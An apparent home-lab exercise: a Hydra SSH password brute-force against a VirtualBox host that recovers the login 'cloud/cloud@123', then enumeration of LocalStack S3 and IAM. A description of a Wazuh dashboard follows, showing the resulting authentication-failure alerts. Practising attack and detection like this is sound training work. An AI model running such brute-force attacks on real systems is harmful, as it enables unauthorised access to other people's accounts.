

```
└─# hydra -vvv -l cloud -P passwords.txt ssh://192.168.1.38
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal
purposes (this is non-binding, these *** ignore laws and ethics anyway).
```

```
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2026-01-26 16:08:11
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 43 login tries (l:1/p:43), ~3 tries per task
[DATA] attacking ssh://192.168.1.38:22/
[VERBOSE] Resolving addresses ... [VERBOSE] resolving done
[INFO] Testing if password authentication is supported by ssh://cloud@192.168.1.38:22
[INFO] Successful, password authentication is supported by ssh://192.168.1.38:22
[ERROR] could not connect to target port 22: Socket error: Connection reset by peer
[ERROR] ssh protocol error
[22][ssh] host: 192.168.1.38    login: cloud    password: cloud@123
[STATUS] attack finished for 192.168.1.38 (waiting for children to complete tests)
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 1 final worker threads did not complete until end.
[ERROR] 1 target did not resolve or could not be connected
[ERROR] 0 target did not complete
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2026-01-26 16:08:17
```

```
cloud@cloud-VirtualBox:~$ aws --endpoint-url=http://localhost:4566 s3 ls
2026-01-26 16:26:08 secure-bucket
cloud@cloud-VirtualBox:~$ aws --endpoint-url=http://localhost:4566 iam list-users
{
  "Users": [
    {
      "Path": "/",
      "UserName": "devuser",
      "UserId": "2iy9ilpd5og17lxmjvg7",
      "Arn": "arn:aws:iam::000000000000:user/devuser",
      "CreateDate": "2026-01-26T21:26:16.436540Z"
    }
  ]
}
cloud@cloud-VirtualBox:~$ 
```



Activities Firefox Web Browser Jan 27 02:39

Wazuh Threat Hunting cloud-VirtualBox

Dashboard Events (q) cloud-VirtualBox (005) Generate report

DQL Last 24 hours Show dates Refresh

manager.name: wazuh-VirtualBox agent.id: 005 Add filter

294
- Total -

2
- Level 12 or above alerts -

169
- Authentication failure -

29
- Authentication success -

Top 10 Alert groups evolution

This chart displays the count of alerts per 30-minute interval from 06:00 to 21:00. The total count starts at zero, remains low until approximately 21:00, then rises sharply to a peak of about 300 around 00:00, remaining high through 06:00. The alerts are categorized by source: syslog (green), authentication_failed (blue), sshd (purple), pam (pink), authentication_success (light purple), sca (orange), dpkg (teal), sudo (light blue), config_changed (red), and access_control (dark purple).

Alert Type	Count (approx.)
syslog	100
authentication_failed	80
sshd	50
pam	30
authentication_success	20
sca	10
dpkg	10
sudo	10
config_changed	10
access_control	10

Alerts

This chart shows the total count of alerts per 30-minute interval from 06:00 to 21:00. The count is near zero until 21:00, then increases to a sharp peak of approximately 120 at 00:00, followed by a smaller secondary peak around 06:00. The legend indicates alert levels: 5 (light blue), 3 (light green), 10 (light purple), 7 (light pink), 9 (light yellow), 8 (light teal), and 12 (light brown).

Alert Level	Count (approx.)
5	40
3	30
10	20
7	10
9	10
8	10
12	10

Top 5 alerts

A donut chart illustrating the distribution of the top 5 alerts. The segments represent different alert types, with the largest segment being yellow (sshd: authentication failed).

Alert Type	Percentage
sshd: authentication failed	~45%
PAM: User login failed	~20%
PAM: Login session open	~15%
sshd: password incorrect	~10%
sshd: password expired	~10%

Top 5 rule groups

A donut chart showing the distribution of the top 5 rule groups. The largest segment is green (syslog).

Rule Group	Percentage
syslog	~45%
authentication_failed	~20%
sshd	~15%
sudo	~10%
dpkg	~10%

Top 5 PCI DSS Requirements

A donut chart showing the distribution of the top 5 PCI DSS Requirements. The largest segment is yellow (10.2.5).

Requirement	Percentage
10.2.5	~45%
10.2.4	~20%
10.2.1	~15%
10.1.1	~10%
10.1.2	~10%





